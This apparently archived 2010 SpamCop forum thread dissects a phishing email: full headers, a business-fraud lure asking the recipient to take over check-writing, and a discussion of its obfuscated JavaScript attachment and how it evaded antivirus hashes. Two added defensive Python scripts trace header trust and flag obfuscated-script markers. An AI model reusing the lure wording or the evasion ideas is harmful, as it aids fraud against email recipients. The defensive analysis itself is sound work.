> Phishing attempts to my spamcop account, 2 such attempts redirecting to numerouno - india . com/x.html
mplungjan@spamcop.net
post Sep 17 2010, 06:20 AM
Post #1
Delivered-To: <myemail>
Received: (qmail 4960 invoked from network); 17 Sep 2010 10:58:28 -0000
Received: from unknown (HELO m1pismtp01-018.prod.mesa1.secureserver.net) ([10.8.12.18])
(envelope-sender <ox[at]rootsproduce.com>)
by smtp31.prod.mesa1.secureserver.net (qmail-1.03) with SMTP
for <myemail>; 17 Sep 2010 10:58:28 -0000
X-IronPort-Anti-spam-Result: AtERAFvmkkzYmsMxf2dsb2JhbAAKBJQihW2HdxUBAQoKDBgEHowGhwKtf4VBBIRGiH0
Received: from c60.cesmail.net ([216.154.195.49])
by m1pismtp01-018.prod.mesa1.secureserver.net with ESMTP; 17 Sep 2010 03:58:27 -0700
Received: from unknown (HELO filter8.cesmail.net) ([192.168.1.218])
by c60.cesmail.net with SMTP; 17 Sep 2010 06:58:27 -0400
Received: (qmail 17745 invoked by uid 1010); 17 Sep 2010 10:58:27 -0000
Delivered-To: spamcop-net-<myname>@spamcop.net
Received: (qmail 17681 invoked from network); 17 Sep 2010 10:58:26 -0000
X-spam-Checker-Version: SpamAssassin 3.2.4 (2008-01-01) on filter8
X-spam-Level:
X-spam-Status: hits=0.1 tests=HTML_MESSAGE,RDNS_NONE version=3.2.4
Received: from unknown (192.168.1.107)
by filter8.cesmail.net with QMQP; 17 Sep 2010 10:58:26 -0000
Received: from unknown (HELO YBTBJES) (92.246.206.203)
by mx70.cesmail.net with SMTP; 17 Sep 2010 10:58:25 -0000
Received: from svtmail07.prod.sabre.com (svtmail04.prod.sabre.com [151.193.64.1])
by mail.global.frontbridge.com with esmtp
id 5A849F-000946-63
for ljl[at]spamcop.net; Fri, 17 Sep 2010 14:58:19 +0300
Received: from samlab (10.208.04.9:61117) by svtmail09.prod.sabre.com (LSMTP for Windows NT v1.1b) with SMTP id <3.C0CBAD1D[at]svtmail05.prod.sabre.com>; Fri, 17 Sep 2010 14:58:19 +0300
Date: Fri, 17 Sep 2010 14:58:19 +0300
From: "Winfred Joiner" <ox[at]rootsproduce.com>
To: ljl[at]spamcop.net
Message-ID: <57114311.39684104853195612400.JavaMail.ita[at]samlab>
Subject: Please help me
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_Part_1695044_17099105.4893020990891"
X-SpamCop-Checked: 92.246.206.203 151.193.64.1

------=_Part_1695044_17099105.4893020990891
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 7bit

Please help me to take over the accounting duties during the period Jackie will be gone. Make arrangements so that you will be able to issue checks and know where to deposit received checks.

------=_Part_1695044_17099105.4893020990891
Content-Type: text/html; name="52399xls.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="52399xls.html"
------=_Part_1695044_17099105.4893020990891--

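The header chain above is the interesting part of the report: SpamCop's X-SpamCop-Checked line names 92.246.206.203 (the host that actually connected to mx70.cesmail.net) and the Received lines below that hop, naming sabre.com and frontbridge.com, are not trustworthy. Here is an added example of that trust-boundary walk as a defender would script it; it is not code from the thread or from SpamCop, and the trusted-relay list and the trimmed header sample are assumptions modelled on the posted headers.

```python
import ipaddress
import re
from email import message_from_string

# Hosts the receiving organisation operates (the cesmail.net relays that
# appear in the OP's headers). Only Received lines written *by* these hosts
# are trustworthy; everything below the first outside hop may be forged.
TRUSTED_RELAYS = {"c60.cesmail.net", "filter8.cesmail.net", "mx70.cesmail.net"}

# Constructed sample, trimmed from the headers posted in the thread.
SAMPLE = """\
Received: from unknown (HELO filter8.cesmail.net) ([192.168.1.218])
  by c60.cesmail.net with SMTP; 17 Sep 2010 06:58:27 -0400
Received: (qmail 17745 invoked by uid 1010); 17 Sep 2010 10:58:27 -0000
Received: from unknown (192.168.1.107)
  by filter8.cesmail.net with QMQP; 17 Sep 2010 10:58:26 -0000
Received: from unknown (HELO YBTBJES) (92.246.206.203)
  by mx70.cesmail.net with SMTP; 17 Sep 2010 10:58:25 -0000
Received: from svtmail07.prod.sabre.com (svtmail04.prod.sabre.com [151.193.64.1])
  by mail.global.frontbridge.com with esmtp id 5A849F-000946-63;
  Fri, 17 Sep 2010 14:58:19 +0300
From: "Winfred Joiner" <ox@rootsproduce.com>
Subject: Please help me
"""

HOP_RE = re.compile(r"from\s+(?P<from>.+?)\s+by\s+(?P<by>\S+)")
IP_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")


def first_external_hop(raw):
    """Walk Received headers newest-first and return (connecting_ip,
    untrusted_received_count) for the first hop that reached one of our
    relays from outside; the remaining headers are the sender's claims."""
    received = message_from_string(raw).get_all("Received") or []
    for index, header in enumerate(received):
        line = " ".join(header.split())  # unfold continuation lines
        hop = HOP_RE.search(line)
        if not hop:
            continue  # local qmail queue entries carry no from/by pair
        if hop["by"] not in TRUSTED_RELAYS:
            break  # written by a host we do not control: nothing below is trusted
        ips = IP_RE.findall(hop["from"])
        if not ips:
            continue
        ip = ipaddress.ip_address(ips[0])
        if ip.is_private:
            continue  # internal relay-to-relay handoff
        return str(ip), len(received) - index - 1
    return None, len(received)
```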
Farelf
post Sep 17 2010, 07:17 AM
Post #2
Thanks mplungjan. Any idea what that bit of JavaScript (the HTML attachment) you were sent does?

Can you refer to these things by way of a Tracking URL rather than as a paste-in of the actual spam? The forum formatting and badword filter changes stuff posted here, there can sometimes be live links to bad places and, although munged slightly, there is exposure of (usually) innocent addresses etc. when you post the spam in public.


--------------------
Plus ça change, plus c’est la même chose
Farelf
post Sep 18 2010, 12:18 AM
Post #3
Well, I'm not a coder's bootlace (the more refined way to say it, if the phrase seems unfamiliar) but ...

From several different code fragments in the (decoded) attachment it seems to be (slightly?) related to jsunpack - probably an unpacker for a lightning download then - though no source for the download is apparent to me. Lots of people might get "caught" by such a thing (if they have scripting allowed on their browser/mail client) if there is an actual payload and whatever that ultimate payload's function(s) might be would be anyone's guess - but identity theft is potentially the most serious.

Nasty - or not sent by anyone wishing you well anyway.

silentlarry
post Sep 20 2010, 01:11 PM
Post #4
FYI for whatever it's worth

I've been getting similar stuff, seems to be increasing every day.

Really low spam assassin score on most of these. Successful filtering is usually by CBL or one of the other BLs.


tracking1
tracking2
tracking3

Farelf
post Sep 20 2010, 07:44 PM
Post #5
QUOTE(silentlarry @ Sep 21 2010, 02:11 AM)
FYI for whatever it's worth

I've been getting similar stuff, seems to be increasing every day.
Well worth raising SL, seems it was and is a 'zero day' sort of thing. Zero detections from the massed AV engines at VirusTotal when the O/P first raised the topic but now my resident Norton says Trojan.Webkit!html - http://securityresponse.symantec.com/secur...-99&tabid=2
QUOTE
Discovered: October 9, 2007
Updated: October 9, 2007 4:42:01 PM
Type: Trojan
Infection Length: Varies
Systems Affected: Windows 98, Windows 95, Windows XP, Solaris, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Linux, Windows 2000

Trojan.Webkit!html is a generic detection for HTML files containing malicious code to redirect users to malicious Web servers.

A successful compromise by a malicious Web server may result in additional malicious files being downloaded to the compromised computer
Seems the 'unescape' coding within the script may be variable and/or some random characters outside the active body of code may be variable - which successfully defeats initial detection - the O/P's version was not picked up by Norton until yesterday's/today's updates. Haven't specifically checked yours but that's what I think is happening - the hash values will be variable, the code content may appear variable until unescape codes resolved, the redirection destination (which is well obfuscated, I can't see it) may be variable, very likely each day's version of the thing will be undetectable as a threat to most scanners for some days after release.

HTML attachments/content in spam have been around for ages - the prudent assumption is, if they are in spam they probably *are* malicious but this is the first time I have personally verified an instance. Well, apart from a few web bugs (can't assume they are history either - to keep a step ahead, spammers sometimes step backwards). The 'inconvenience' of safe practice (no scripting allowed, no preview of email, view text only, don't read obvious spam at all, don't open unknown attachments or click on unknown links, query/prevent redirections) seems to be vindicated once again.

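Farelf's point above, that a re-randomised filler and a changed unescape() string give each day's copy a new hash, is why an HTML attachment is better judged by what its script does than by its checksum. The following is an added example, not the thread's attachment nor any SpamCop code: it pulls HTML attachments out of a constructed lure shaped like the OP's message, flags script markers, and fingerprints the script's structure so two variants with different hashes still match. The sample messages, marker list and fingerprint rules are assumptions.

```python
import hashlib
import re
from email import message_from_bytes
from email.message import EmailMessage
from email.policy import default

# Markers worth flagging in an HTML attachment (the thread's sample carried
# unescape()-encoded script); a raw hash alone misses re-randomised variants.
SUSPICIOUS = ("<script", "unescape(", "document.write(", "eval(")
COMMENT_RE = re.compile(r"<!--.*?-->|/\*.*?\*/", re.S)
STRING_RE = re.compile(r"""(["'])(?:\\.|(?!\1).)*\1""")


def build_sample(html):
    """Constructed lure shaped like the OP's message: a text part plus a
    base64 HTML attachment. Not the real attachment from the thread."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["Subject"] = "Please help me"
    msg.set_content("Please help me to take over the accounting duties.")
    msg.add_attachment(html.encode(), maintype="text", subtype="html",
                       filename="52399xls.html")
    return msg.as_bytes()


def script_shape(html):
    """Fingerprint of the script structure only: filler comments and the
    varying string literal fed to unescape() do not change it."""
    code = "\n".join(re.findall(r"<script[^>]*>(.*?)</script>", html, re.S | re.I))
    code = COMMENT_RE.sub("", code)    # drop comments (assumed quote-free)
    code = STRING_RE.sub("STR", code)  # collapse every string literal
    return hashlib.sha256("".join(code.split()).encode()).hexdigest()[:16]


def inspect_html_attachments(raw):
    """One record per HTML attachment: raw hash, suspicious markers, shape."""
    findings = []
    for part in message_from_bytes(raw, policy=default).walk():
        if not part.is_attachment() or part.get_content_type() != "text/html":
            continue
        body = part.get_payload(decode=True)  # base64 decoded here
        text = body.decode("latin-1", "replace")
        findings.append({"filename": part.get_filename(),
                         "sha256": hashlib.sha256(body).hexdigest(),
                         "markers": [m for m in SUSPICIOUS if m in text.lower()],
                         "shape": script_shape(text)})
    return findings


# Two constructed variants: same script, different filler and payload string.
VARIANT_A = ("<html><body><script>/* a7f3k2 */\n"
             "document.write(unescape('%3Cp%3EVariant A%3C%2Fp%3E'));\n"
             "</script></body></html>")
VARIANT_B = ("<html><body><script>/* q9z1m8 */\n"
             "document.write(unescape('%3Cp%3EVariant B%3C%2Fp%3E'));\n"
             "</script></body></html>")
```

Run `inspect_html_attachments(build_sample(VARIANT_A))` and the same for VARIANT_B: the sha256 values differ while the shape fingerprint is identical.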